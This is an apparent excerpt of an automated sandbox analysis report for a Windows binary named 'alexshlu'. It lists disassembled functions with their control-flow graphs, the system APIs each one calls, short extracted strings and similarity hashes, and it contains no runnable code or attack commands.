                                                                                                                                                                                                                                        Function 0042BFD3 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 456COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 679 42bfd3-42c0e8 call 43ce00 682 42c0ed-42c13a GetComputerNameExA 679->682 683 42c140-42c167 682->683 683->683 684 42c169-42c173 683->684 685 42c175-42c17f 684->685 686 42c18d 684->686 688 42c180-42c189 685->688 687 42c18f-42c19c 686->687 690 42c1bb-42c20f GetComputerNameExA 687->690 691 42c19e-42c1a5 687->691 688->688 689 42c18b 688->689 689->687 693 42c210-42c252 690->693 692 42c1b0-42c1b9 691->692 692->690 692->692 693->693 694 42c254-42c25e 693->694 695 42c260-42c267 694->695 696 42c27b-42c288 694->696 697 42c270-42c279 695->697 698 42c28a-42c291 696->698 699 42c2ab-42c2ff 696->699 697->696 697->697 700 42c2a0-42c2a9 698->700 702 42c300-42c324 699->702 700->699 700->700 702->702 703 42c326-42c330 702->703 704 42c332-42c339 703->704 705 42c34b-42c358 703->705 706 42c340-42c349 704->706 707 42c35a-42c361 705->707 708 42c37b-42c3d6 call 43ce00 705->708 706->705 706->706 709 42c370-42c379 707->709 713 42c3e0-42c3fa 708->713 709->708 709->709 713->713 714 42c3fc-42c406 713->714 715 42c41b-42c42f 714->715 716 42c408-42c40f 714->716 717 42c572-42c5b1 715->717 718 42c435-42c43c 715->718 719 42c410-42c419 716->719 721 42c5c0-42c5e7 717->721 720 42c440-42c44a 718->720 719->715 719->719 722 42c460-42c466 720->722 723 42c44c-42c451 720->723 721->721 724 42c5e9-42c5fb 721->724 726 42c490-42c49e 722->726 727 42c468-42c46b 722->727 725 42c510-42c516 723->725 728 42c61b-42c61e call 430520 724->728 729 42c5fd-42c604 724->729 735 42c518-42c51e 725->735 732 42c4a4-42c4a7 726->732 733 42c52a-42c533 726->733 727->726 730 42c46d-42c483 727->730 737 42c623-42c643 728->737 731 42c610-42c619 729->731 730->725 731->728 731->731 732->733 736 42c4ad-42c50e 732->736 739 42c535-42c537 733->739 740 42c539-42c53c 733->740 735->717 738 42c520-42c522 735->738 736->725 738->720 743 42c528 738->743 739->735 741 42c56e-42c570 740->741 742 42c53e-42c56c 740->742 741->725 742->725 743->717
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042C113
                                                                                                                                                                                                                                        • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042C1D8
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ComputerName
                                                                                                                                                                                                                                        • String ID: x
                                                                                                                                                                                                                                        • API String ID: 3545744682-2363233923
                                                                                                                                                                                                                                        • Opcode ID: dd7dd52a73c17c107c662ee8ca0c022aa0f15367076f24ecb02be622242e9914
                                                                                                                                                                                                                                        • Instruction ID: cbfe56490d4610b99627c39bd120223bdbde8b4c29662e55905f397c0fd00549
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd7dd52a73c17c107c662ee8ca0c022aa0f15367076f24ecb02be622242e9914
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1AD1176060C7E18ED7358B2894903BFBBD1AF97344F5849AED0D54B382D739940AC797
                                                                                                                                                                                                                                        Function 00426170 Relevance: 5.3, Strings: 4, Instructions: 318COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 788 426170-42618f 789 426190-4261bf 788->789 789->789 790 4261c1-4261cd 789->790 791 426214-426221 790->791 792 4261cf-4261d7 790->792 794 426230-426283 791->794 793 4261e0-4261e7 792->793 795 4261f0-4261f6 793->795 796 4261e9-4261ec 793->796 794->794 797 426285-426289 794->797 795->791 799 4261f8-42620c call 43b480 795->799 796->793 798 4261ee 796->798 800 426310-426312 797->800 801 42628f-4262af call 439b40 797->801 798->791 805 426211 799->805 802 4264ef-4264f8 800->802 807 4262b0-4262df 801->807 805->791 807->807 808 4262e1-4262ed 807->808 809 426336-42633a 808->809 810 4262ef-4262f7 808->810 812 426340-426349 809->812 813 4264e6-4264ec call 439b60 809->813 811 426300-426307 810->811 814 426317-42631d 811->814 815 426309-42630c 811->815 816 426350-426365 812->816 813->802 814->809 819 42631f-42632e call 43b480 814->819 815->811 818 42630e 815->818 816->816 820 426367-426369 816->820 818->809 825 426333 819->825 823 426370-42637d call 407ff0 820->823 824 42636b 820->824 828 426390-42639a 823->828 824->823 825->809 829 426380-42638e 828->829 830 42639c-42639f 828->830 829->828 831 4263b3-4263b7 829->831 832 4263a0-4263af 830->832 834 4264dd-4264e3 call 408000 831->834 835 4263bd-4263c8 831->835 832->832 833 4263b1 832->833 833->829 834->813 836 4263ca-4263d1 835->836 837 42641b-426467 call 407ff0 call 408e90 835->837 840 4263ec-4263f0 836->840 851 426470-4264b8 837->851 843 4263f2-4263fb 840->843 844 4263e0 840->844 847 426410-426414 843->847 848 4263fd-426400 843->848 846 4263e1-4263ea 844->846 846->837 846->840 847->846 850 426416-426419 847->850 848->846 850->846 851->851 852 4264ba-4264d9 call 408ff0 call 408000 851->852 852->834
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID: 4zVc$8zVc$YNMZ$cba`
                                                                                                                                                                                                                                        • API String ID: 2994545307-1799417857
                                                                                                                                                                                                                                        • Opcode ID: eaf66d541d549ce35d0b7173bc81318c446716c3833972a3082171e3945cfb6b
                                                                                                                                                                                                                                        • Instruction ID: a4538a0261ff6c2ac210d57fc6ac5424e6a326b8b8d8802f404cc31a7d59ec03
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eaf66d541d549ce35d0b7173bc81318c446716c3833972a3082171e3945cfb6b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 189147B2F042208BD724DA25EC8172B7292EBD1314F5A857EEC8597342E678AC00C7DA
                                                                                                                                                                                                                                        Function 00416B7E Relevance: 1.8, APIs: 1, Instructions: 335COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 890e8e76508b01334db47f64388eac8d659fe5be4548ddbfe270fdd3745dd69d
                                                                                                                                                                                                                                        • Instruction ID: 4d3fd89be0cb7aed4be93335616a378edd6ad360b4f2b7dd84c825cf95623c92
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 890e8e76508b01334db47f64388eac8d659fe5be4548ddbfe270fdd3745dd69d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9BA159B16047418FCB24CF34C891663BBE2FF56314B098A6ED49A8B792E738F845CB55
                                                                                                                                                                                                                                        Function 0043E690 Relevance: 1.6, Strings: 1, Instructions: 384COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID: @CDE
                                                                                                                                                                                                                                        • API String ID: 2994545307-1513065382
                                                                                                                                                                                                                                        • Opcode ID: cbdfbb28d977ac1ea6b7f73f0ada9322f454d3da5a8c62154e5dc83033fd8ee1
                                                                                                                                                                                                                                        • Instruction ID: 3c5ac0be7424b57116813a4f2293c38aabf5a2246835f37d4781b8179357b19c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cbdfbb28d977ac1ea6b7f73f0ada9322f454d3da5a8c62154e5dc83033fd8ee1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EFB146717493414BC318DB2AC8D1A3BBBE6ABE9314F1CD93DE58687392C638DC058796
                                                                                                                                                                                                                                        Function 0043B480 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LdrInitializeThunk.NTDLL(0043D4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B4AE
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                        Function 00417E82 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: tuv
                                                                                                                                                                                                                                        • API String ID: 0-2475268160
                                                                                                                                                                                                                                        • Opcode ID: 692413315616f7dcebff6ff457f6b3838c60e2c9e7b6f7554dd79316d44026a4
                                                                                                                                                                                                                                        • Instruction ID: 96cc1be5c7b42f4822ccf6fdabcc1d0a1cf8542e79077bfe6f2257edbdd6f4ef
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 692413315616f7dcebff6ff457f6b3838c60e2c9e7b6f7554dd79316d44026a4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B6133B6604700CFC7208F24D8923A3B3F2FF96318F18456EE996477A1E739A945C759
                                                                                                                                                                                                                                        Function 0043DBD0 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                        • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                        • Opcode ID: a54cd9664649f0a3eb3b986b2c8d66ddc9897b79c163bf161da4d5756e812fe2
                                                                                                                                                                                                                                        • Instruction ID: 1421818bc4f15c0d032df179158ed2797c8d4970c2420d5e39c05150b2e3af5d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a54cd9664649f0a3eb3b986b2c8d66ddc9897b79c163bf161da4d5756e812fe2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C33100B15183048BC314DF18E8C162BBBF8FB9A314F15A92DE68687391D3759908CB9A
                                                                                                                                                                                                                                        Function 00409CC0 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: \U^_
                                                                                                                                                                                                                                        • API String ID: 0-352632802
                                                                                                                                                                                                                                        • Opcode ID: b233260ff75ba58cbb536c0014e0eb0df055bc4e14581868770786c388d706bb
                                                                                                                                                                                                                                        • Instruction ID: 5fa690bb4235e6f9a1b833386d74a381627e7adb8b1be8a89cbf23ee07b36487
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b233260ff75ba58cbb536c0014e0eb0df055bc4e14581868770786c388d706bb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D011E23060C3808FD324DF3495549ABBBA5EFD7748F545A2CE4C56B281C735980A8FAA
                                                                                                                                                                                                                                        Function 0043DCF0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 7e2f85c664c8434edd563ad3eec3cf26f3dbdf93c28ccb518c6c18397a03e6ac
                                                                                                                                                                                                                                        • Instruction ID: 42590aa1c4a3029240d7faad05c1566b36b776a36cf424c854185cc8c2ee326e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e2f85c664c8434edd563ad3eec3cf26f3dbdf93c28ccb518c6c18397a03e6ac
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 58717A31A043014BC714AF29E890A3FB7A6EFDD750F1AD43EE4868B365DB349C11878A
                                                                                                                                                                                                                                        Function 00434BDC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetUserDefaultUILanguage.KERNELBASE ref: 00434C09
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DefaultLanguageUser
                                                                                                                                                                                                                                        • String ID: t
                                                                                                                                                                                                                                        • API String ID: 95929093-2238339752
                                                                                                                                                                                                                                        • Opcode ID: 3fa4c25dce8568a0724ebcbfa99840aa77e9227c5342f76fc488d9eef6af0589
                                                                                                                                                                                                                                        • Instruction ID: 08a8b9a0e37a212ebea7de5d04b95149eac63241ee44ff142c93878423301f38
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3fa4c25dce8568a0724ebcbfa99840aa77e9227c5342f76fc488d9eef6af0589
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53F0FF34808298CFDB10DF68D4943EEBBF16F66304F1880ACC08497382D37A9A84CB12
                                                                                                                                                                                                                                        Function 0043B720 Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 0043B720
                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 0043B740
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ForegroundWindow
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2020703349-0
                                                                                                                                                                                                                                        • Opcode ID: a4781643aa2d8fd57512208f1c3e62aa4b8d5176cb57333a04816d28865289df
                                                                                                                                                                                                                                        • Instruction ID: 191facca889f69fa70601903ca8693053aaba1cbaba24685dbffd0b384c421fe
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4781643aa2d8fd57512208f1c3e62aa4b8d5176cb57333a04816d28865289df
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7ED0A7FDD20110EBC604AB71FC4A41B3A1AEB4722DB545539EC0343352DA39782E868F
                                                                                                                                                                                                                                        Function 0043B420 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B29B,?,00000001,?,?,?,?,?,?,?), ref: 0043B452
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                        • Opcode ID: c927d8c6f07db5a3335dd59de96673b47f735cea6f05c616f97ff7e83687720b
                                                                                                                                                                                                                                        • Instruction ID: a89ac6462aaa6a8a5f29c09ee71e481237a955995f4f3f89a98fbf9f2f2a6ed3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c927d8c6f07db5a3335dd59de96673b47f735cea6f05c616f97ff7e83687720b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FBE0E536904210EBD2002B357C06B177678EF9B715F060436F40152115D739E801C5DE
                                                                                                                                                                                                                                        Function 00430879 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: BlanketProxy
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3890896728-0
                                                                                                                                                                                                                                        • Opcode ID: 83941c5ff406fddefe2a55fc962621e55030b9d07cbba56e81ba996dd76ec11c
                                                                                                                                                                                                                                        • Instruction ID: 1146a04256a80fd680d05c5d227ab35205256b262c73fed29a8c8dc337ffb545
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83941c5ff406fddefe2a55fc962621e55030b9d07cbba56e81ba996dd76ec11c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E00114B5249702CFE310CF64D5D8B4BBBF1AB84304F14892CE8A54B385C7B9A9498FC2
                                                                                                                                                                                                                                        Function 0042E343 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: BlanketProxy
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3890896728-0
                                                                                                                                                                                                                                        • Opcode ID: f641e3c77b6ce86b3dd807bf46eed919c30205036380bbbe1e710ba534cd93a1
                                                                                                                                                                                                                                        • Instruction ID: cdfd11b330a352dee93e16416f8877f043d61a2de36bf40ddff772d5b84e5129
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f641e3c77b6ce86b3dd807bf46eed919c30205036380bbbe1e710ba534cd93a1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C601F9B86097058FE305DF28D498B5ABBF1FB89304F10881CE4958B3A1C779A949CF81
                                                                                                                                                                                                                                        Function 0040CDF0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CE03
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Initialize
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                                                                                                                        • Opcode ID: 61d928746ba4ae58ea54a0875f1c3d0382ed5290a25c5d8e3ced17899992ccae
                                                                                                                                                                                                                                        • Instruction ID: f1973b7854016afe0481596635c710bb103935c4c1c993b3491e04eff0e8badb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61d928746ba4ae58ea54a0875f1c3d0382ed5290a25c5d8e3ced17899992ccae
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01D0A7345545486BD250A75CDD0BF563A5C9703B29F400239B763D61D1D9506920C669
                                                                                                                                                                                                                                        Function 0040CE23 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CE35
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeSecurity
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 640775948-0
                                                                                                                                                                                                                                        • Opcode ID: 9269880a45a3c80f6ec8299234c73a1314589920fa48725fb3d67ea21efaca66
                                                                                                                                                                                                                                        • Instruction ID: 9bb2948b1e33ad1240181575e0f5375bfb099cf60bc3df2fdc322b3d55e14239
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9269880a45a3c80f6ec8299234c73a1314589920fa48725fb3d67ea21efaca66
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CAD0C9343D83007AF5748B48ED53F1432169702F11FB00629F322FE6D4C9E07121861D
                                                                                                                                                                                                                                        Function 00439B60 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,00000000,00000000,00412F5C), ref: 00439B80
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                                                                                        • Opcode ID: d0720c9dfbe2666778a34d5469e5ae55c8d5964329e0fb1cba2b62a2f878fbc3
                                                                                                                                                                                                                                        • Instruction ID: 8d81dc3d2e1c71e2762f942217139477682170591cb2c618f1865e02491f5b7e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0720c9dfbe2666778a34d5469e5ae55c8d5964329e0fb1cba2b62a2f878fbc3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76D0C935505126EBCA506B28BC15BC73A989F4A671F0708A1B4006A075C765EC919AD8
                                                                                                                                                                                                                                        Function 00439B40 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?,?,00414E57,00000400), ref: 00439B50
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                        • Opcode ID: a95155655fbe3eb8f0e77a05497d8175f8be12db265ae77d37b3e7249a9ffdc4
                                                                                                                                                                                                                                        • Instruction ID: 3d340f236624c1ae318c051adf9ea47d82c8c11c3707c94fc3fa8f772c7fe72e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a95155655fbe3eb8f0e77a05497d8175f8be12db265ae77d37b3e7249a9ffdc4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91C04831145224ABDA10AB15EC09B8A3AA8AF496A1F1A04A6B005660B28760AC929A98

                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                        Function 00419C10 Relevance: 17.0, APIs: 2, Strings: 7, Instructions: 1297COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0043B480: LdrInitializeThunk.NTDLL(0043D4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B4AE
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0041A21A
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0041A29B
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
